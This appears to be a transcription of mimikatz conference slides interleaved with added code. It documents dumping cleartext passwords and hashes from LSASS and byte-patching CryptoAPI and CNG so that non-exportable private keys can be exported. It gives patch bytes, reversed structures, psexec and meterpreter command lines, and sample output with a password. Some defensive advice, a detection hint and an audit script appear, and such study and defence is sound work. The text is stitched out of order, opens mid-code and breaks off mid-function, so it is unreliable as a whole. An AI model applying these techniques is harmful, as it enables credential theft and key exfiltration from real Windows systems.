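uint8_t g_rsaenh_site1[6] = { 0x0F, 0x85, 0x33, 0xC7, 0xFF, 0xFF };  /* .text:0AC0B7CB jnz continue_key_export_or_archive */
uint8_t g_rsaenh_site2[6] = { 0x0F, 0x85, 0xB6, 0x3B, 0xFF, 0xFF };  /* .text:0AC1F749 jnz continue_key_export_or_archive_prepare */
/* ncrypt!SPCryptExportKey in the KeyIso service (slide: 1 byte written). */
uint8_t g_ncrypt_site[2]  = { 0x75, 0x1C };                          /* .text:6C815210 jnz short continue_key_export */

#define RSAENH_SITE1_VA 0x0AC0B7CBu
#define RSAENH_SITE2_VA 0x0AC1F749u
#define NCRYPT_SITE_VA  0x6C815210u

/* Total bytes changed for the CAPI patch (expected 4), -1 on any failed check. */
int patch_rsaenh(void) {
    int a = patch_site(g_rsaenh_site1, 0, RSAENH_SITE1_VA);
    int b = patch_site(g_rsaenh_site2, 0, RSAENH_SITE2_VA);
    return (a < 0 || b < 0) ? -1 : a + b;
}

/* Bytes changed for the CNG patch (expected 1). */
int patch_ncrypt(void) { return patch_site(g_ncrypt_site, 0, NCRYPT_SITE_VA); }

/* Convenience: target of the branch at the start of a buffer, 0 if unrecognised. */
uint32_t target_of(const uint8_t *code, uint32_t base) {
    uint32_t t = 0;
    branch_target(code, 0, base, &t);
    return t;
}

static void show(const char *name, const uint8_t *code, size_t len, uint32_t base) {
    printf("%-14s %08X:", name, base);
    for (size_t i = 0; i < len; i++) printf(" %02X", code[i]);
    printf("   -> %08X\n", target_of(code, base));
}

int main(void) {
    show("rsaenh #1", g_rsaenh_site1, 6, RSAENH_SITE1_VA);
    show("rsaenh #2", g_rsaenh_site2, 6, RSAENH_SITE2_VA);
    show("ncrypt", g_ncrypt_site, 2, NCRYPT_SITE_VA);
    printf("patchcapi: %d byte(s) changed\n", patch_rsaenh());
    printf("patchcng : %d byte(s) changed\n", patch_ncrypt());
    show("rsaenh #1", g_rsaenh_site1, 6, RSAENH_SITE1_VA);
    show("rsaenh #2", g_rsaenh_site2, 6, RSAENH_SITE2_VA);
    show("ncrypt", g_ncrypt_site, 2, NCRYPT_SITE_VA);
    return 0;
}
```

The same decoder is useful on the defensive side: comparing the first bytes at these sites in a running LSASS or rsaenh.dll mapping against the on-disk image is enough to spot this patch, since a `90 E9` or `EB` where the file has `0F 85` or `75` is the whole signature.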
mimikatz :: crypto :: patchcng :: demo time

Import, export, import as not exportable… export again
mimikatz :: crypto :: patchcng :: limitations

The patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM

mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the certificates MMC snap-in cannot export CNG certificates… even those that are exportable (hu?)
- certutil can…
mimikatz :: crypto :: patchcng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo
Some commands:
mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do?
Exactly the same as for sekurlsa: it will prevent access to accounts / computer
– no admin, no admin, no admin…
Basics
– Use smartcards / tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz :: that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: wdigest :: theory
This time we know:
– that WDigest keeps the password in memory « by protocol » for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's perform a search in WDigest
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's perform a search in WDigest
– SpAcceptCredentials takes the clear password in its args
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the doubly linked list wdigest!l_LogSessList
.text:7409D151 _DigestCalcHA1@8          call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16   call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
Workflow (diagram): LsaEnumerateLogonSessions → for each LUID → search the wdigest!l_LogSessList linked list for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
	struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
	struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
	DWORD UsageCount;
	struct _KIWI_WDIGEST_LIST_ENTRY *This;
	LUID LocallyUniqueIdentifier;
	[…]
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
	[…]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually I've only used a logical (empirical) approach to search passwords…
– Protocol reading
– Symbols searching
~ Boring ~… let's be more brutal this time: make a WinDBG trap
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe

0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp :: how?
Let's log in with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Our LiveSSP provider
Yeah! Pass the Hash capability with Live account too…
Live user can logon through RDP via SSO
mimikatz :: sekurlsa :: livessp :: workflow
Workflow (diagram): LsaEnumerateLogonSessions → for each LUID → search the livessp!LiveGlobalLogonSessionList linked list for the LUID → KIWI_LIVESSP_LIST_ENTRY → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
	DWORD isSupp;
	DWORD unk0;
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
	struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
	struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
	DWORD unk4;
	DWORD unk5;
	PVOID unk6;
	LUID LocallyUniqueIdentifier;
	LSA_UNICODE_STRING UserName;
	PVOID unk7;
	PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me, yes!
mimikatz :: sekurlsa :: kerberos
Let's log in with a normal account
After credentials protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

Kerberos part for password
Kerberos ticket part? Maybe ;)
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow
Workflow (diagram): LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
	DWORD unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
#ifdef _M_X64
	BYTE unk4[32];
#elif defined _M_IX86
	BYTE unk4[20];
#endif
	LUID LocallyUniqueIdentifier;
#ifdef _M_X64
	BYTE unk5[44];
#elif defined _M_IX86
	BYTE unk5[36];
#endif
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow
Workflow (diagram): LsaEnumerateLogonSessions → for each LUID → search the kerberos!KerbLogonSessionList linked list for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
	struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
	struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
	DWORD UsageCount;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	DWORD unk3;
	DWORD unk4;
	PVOID unk5;
	PVOID unk6;
	PVOID unk7;
	LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
	DWORD unk8;
#endif
	DWORD unk9;
	DWORD unk10;
	PVOID unk11;
	DWORD unk12;
	DWORD unk13;
	PVOID unk14;
	PVOID unk15;
	PVOID unk16;
	[…]
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos “hu?”
Ok. It works…
But why?
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…
– For password auth
  • password hash for shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on client
  • No hash on client
  – NTLM hash on client…
  – KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, to be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process to take benefit of its keys when we called it
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and “imports” the keys initialized by LSASS
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
Diagram: the NT5 protection keys live in lsasrv inside lsass and are copied… into the lsasrv loaded by mimikatz: g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8])
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
Diagram: the NT6 protection keys live in lsasrv inside lsass and are copied… into mimikatz: InitializationVector (BYTE[16]), h3DesKey and hAesKey (each a KIWI_BCRYPT_KEY pointing to a KIWI_BCRYPT_KEY_DATA)
typedef struct _KIWI_BCRYPT_KEY_DATA {
	DWORD size;
	DWORD tag;
	DWORD type;
	DWORD unk0;
	DWORD unk1;
	DWORD unk2;
	DWORD unk3;
	PVOID unk4;
	BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
	DWORD size;
	DWORD type;
	PVOID unk0;
	PKIWI_BCRYPT_KEY_DATA cle;
	PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo
Security Packages / Protection Keys
Package          Symbols                                 Type
tspkg            tspkg!TSGlobalCredTable                 RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                   LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList      LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList           LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable    RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList                 LIST_ENTRY
                 lsasrv!LogonSessionListCount            ULONG

Key     NT 5 Symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key     NT 6 Symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:
mimikatz "privilege::debug" "sekurlsa::logonPasswords full" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
	msv1_0 :
	 Utilisateur  : Gentil Kiwi
	 Domaine      : vm-w8-rp-x
	 Hash LM      : d0e9aee149655a6075e4540af1f22d3b
	 Hash NTLM    : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 Utilisateur  : Gentil Kiwi
	 Domaine      : vm-w8-rp-x
	 Mot de passe : waza1234
	wdigest :
	 Utilisateur  : Gentil Kiwi
	 Domaine      : vm-w8-rp-x
	 Mot de passe : waza1234
	tspkg :
	 Utilisateur  : Gentil Kiwi
	 Domaine      : vm-w8-rp-x
	 Mot de passe : waza1234
	livessp :
	 n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do?
Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts: network login instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Let opportunities to stop retro compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates / keys
  • Even those which are “not” exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again?)
mod_mimikatz_crypto
mimikatz :: crypto :: how it's protected?
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer / User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer / server opens a “session”
Export / Usage can be limited by:
– Password
– Popup
– Export / Archive flag not present
Constraint for most users
Unavailable for computer keys
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
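As an added audit example (not code from the slides or from mimikatz), the following PowerShell lists, for every private key in a certificate store, whether it is held by a legacy CryptoAPI CSP or by a CNG KSP and what the provider's export flag says, which is the software-only check the slides describe. It assumes Windows PowerShell on .NET Framework 4.6 or later (for RSACertificateExtensions); the function name Get-PrivateKeyExportInfo and its StorePath parameter are mine.

```powershell
# Added audit example (not from the slides, not mimikatz code).
# For every private key in a certificate store, report which API holds it
# (legacy CryptoAPI CSP vs CNG KSP) and what the provider's export flag says.
# Assumes Windows PowerShell on .NET Framework 4.6+ (RSACertificateExtensions).
function Get-PrivateKeyExportInfo {
    [CmdletBinding()]
    param([string]$StorePath = 'Cert:\CurrentUser\My')   # hypothetical function and parameter names

    foreach ($cert in (Get-ChildItem -Path $StorePath | Where-Object { $_.HasPrivateKey })) {
        $info = [ordered]@{
            Subject    = $cert.Subject
            Thumbprint = $cert.Thumbprint
            Api        = 'unknown'
            Provider   = $null
            Exportable = $null
        }
        try {
            $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
            if ($rsa -is [System.Security.Cryptography.RSACng]) {
                # CNG key kept by a KSP such as "Microsoft Software Key Storage Provider":
                # an ExportPolicy of None is what makes an export fail with NTE_BAD_KEY_STATE
                $info.Api        = 'CNG'
                $info.Provider   = $rsa.Key.Provider.Provider
                $info.Exportable = ($rsa.Key.ExportPolicy -ne [System.Security.Cryptography.CngExportPolicies]::None)
            } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                # legacy CryptoAPI key kept by a CSP such as "Microsoft Enhanced Cryptographic Provider v1.0"
                $info.Api        = 'CryptoAPI'
                $info.Provider   = $rsa.CspKeyContainerInfo.ProviderName
                $info.Exportable = $rsa.CspKeyContainerInfo.Exportable
            } elseif ($null -eq $rsa) {
                $info.Api = 'non-RSA'   # ECDSA and other key types are not covered here
            }
        } catch {
            # e.g. a smart card key whose card is not inserted: the flag cannot be read
            $info.Provider = "error: $($_.Exception.Message)"
        }
        [pscustomobject]$info
    }
}

# Keys reported Exportable = True in a software provider are the ones worth moving
# to a smart card / HSM as the slides recommend; Exportable = False is only a
# software check enforced by the CSP/KSP, not a guarantee.
Get-PrivateKeyExportInfo | Format-Table -AutoSize
```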
mimikatz :: crypto :: capi :: how it works?
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.”
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it's exported? ( level)
Diagram (“PLAYSKOOL” level): Process → Ask to export Key → CryptoAPI and RSA CSP → Load Private Key → DPAPI Decode → Exportable? yes → Exported Key / no → NTE_BAD_KEY_STATE
mimikatz :: crypto :: patchcapi :: because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable
mimikatz # crypto::exportCertificates
Emplacement : CERT_SYSTEM_STORE_CURRENT_USER\My
 - Benjamin Delpy
	Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider      : Microsoft Enhanced Cryptographic Provider v1.0
	Type          : AT_KEYEXCHANGE
	Exportabilité : NON
	Taille clé    : 2048
	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
Exportable?
mimikatz :: crypto :: patchcapi :: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space…
Before:
  .text:0AC0B7CB  0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
After:
  .text:0AC0B7CB  90                   nop
  .text:0AC0B7CC  E9 33 C7 FF FF       jmp  continue_key_export_or_archive

Before:
  .text:0AC1F749  0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
After:
  .text:0AC1F749  90                   nop
  .text:0AC1F74A  E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare

(Each patch changes only the two opcode bytes 0F 85 → 90 E9; the rel32 displacement is untouched, since nop + jmp ends at the same address as the 6-byte jnz. Two patches, two bytes each: the "4" bytes.)
mimikatz :: crypto :: patchcapi :: demo time

Import, export, import as not exportable… export!
mimikatz :: crypto :: patchcapi :: limitations

Because
– I'm lazy
– In the majority of cases I've seen RSA keys in real-life use; Elliptic Curve a little…

mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI… – It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported (level)

[Diagram: the process asks CNG to export a key → RPC → KeyIso service (inside the LSASS process; on NT6 a system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP) → loads the private key (DPAPI decode) → "Exportable?" check: yes → exported key; no → NTE_NOT_SUPPORTED returned over RPC]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) → ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportKeys [user]
CNG keys:
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportable : NO
    Key size   : 2048
    Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) The requested operation is not supported.
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

This time checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
Before:
  .text:6C815210  75 1C    jnz  short continue_key_export
After:
  .text:6C815210  EB 1C    jmp  short continue_key_export
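The byte arithmetic behind both patches, the two rsaenh!CPExportKey jnz on the patchcapi slide and the keyiso jnz above, as an added example written for this page (not mimikatz code): it never touches a process, it only rewrites the instruction bytes, proves the branch target is unchanged and counts the bytes that differ. Addresses and bytes are the ones printed on the slides; the x86 encodings (0F 8x rel32 for a near jcc, 7x rel8 for a short one) are standard.

```python
"""jcc -> jmp patch arithmetic, as used by crypto::patchcapi / crypto::patchcng.

Added example for this page, not mimikatz code: nothing is written to any
process, the functions only rewrite instruction bytes and prove the branch
target is preserved. Addresses and bytes are the ones printed on the slides.
"""
import struct

NOP, NEAR_JMP, SHORT_JMP = 0x90, 0xE9, 0xEB


def _is_near_jcc(code):
    # 0F 80..8F rel32 : conditional near jump, 6 bytes
    return len(code) >= 6 and code[0] == 0x0F and 0x80 <= code[1] <= 0x8F


def _is_short_jcc(code):
    # 70..7F rel8 : conditional short jump, 2 bytes
    return len(code) >= 2 and 0x70 <= code[0] <= 0x7F


def branch_target(addr, code):
    """Absolute target of the jump whose first byte is at addr (32-bit wrap)."""
    if _is_near_jcc(code):
        size, rel = 6, struct.unpack_from('<i', code, 2)[0]
    elif code[0] == NEAR_JMP:
        size, rel = 5, struct.unpack_from('<i', code, 1)[0]
    elif _is_short_jcc(code) or code[0] == SHORT_JMP:
        size, rel = 2, struct.unpack_from('<b', code, 1)[0]
    else:
        raise ValueError('not a jcc/jmp at 0x%08X' % addr)
    return (addr + size + rel) & 0xFFFFFFFF


def patch_jcc_to_jmp(code):
    """Turn a conditional jump into an unconditional one with the same target.

    near : 0F 8x rel32 -> 90 E9 rel32. E9 rel32 is one byte shorter than the
           jcc, so a NOP goes first; the instruction then ends at the same
           address and the existing rel32 still points where it did (2 bytes change).
    short: 7x rel8 -> EB rel8 (1 byte changes).
    """
    if _is_near_jcc(code):
        return bytes([NOP, NEAR_JMP]) + bytes(code[2:6])
    if _is_short_jcc(code):
        return bytes([SHORT_JMP, code[1]])
    raise ValueError('not a conditional jump')


def verify_patch(addr, code):
    """Return (patched hex, target, bytes changed) after checking the target is kept."""
    patched = patch_jcc_to_jmp(code)
    # a leading NOP means the jmp itself starts one byte further on
    start, jmp = (addr + 1, patched[1:]) if patched[0] == NOP else (addr, patched)
    if branch_target(start, jmp) != branch_target(addr, code):
        raise AssertionError('patch would change the branch target')
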